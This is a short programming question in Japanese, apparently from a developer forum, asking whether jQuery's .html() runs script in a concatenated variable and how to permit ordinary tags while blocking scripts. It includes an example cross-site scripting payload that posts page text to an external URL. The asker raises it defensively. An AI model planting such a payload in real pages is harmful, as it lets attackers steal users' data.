jQuery.html() は危険ですか?
$("#id").html("<span>"+ variable + "</span>");
上記の例のように、変数が次の値を持つ場合:
"<script> $.post("external_url.php", {sesitivedata= $("#someElement").text()}, function() {} ) </script>"
スクリプトは実行されますか? もしそうなら、変数に通常のhtmlタグを含めてスクリプトを含めないようにする方法はありますか?
編集:スクリプトタグを文字列に追加しました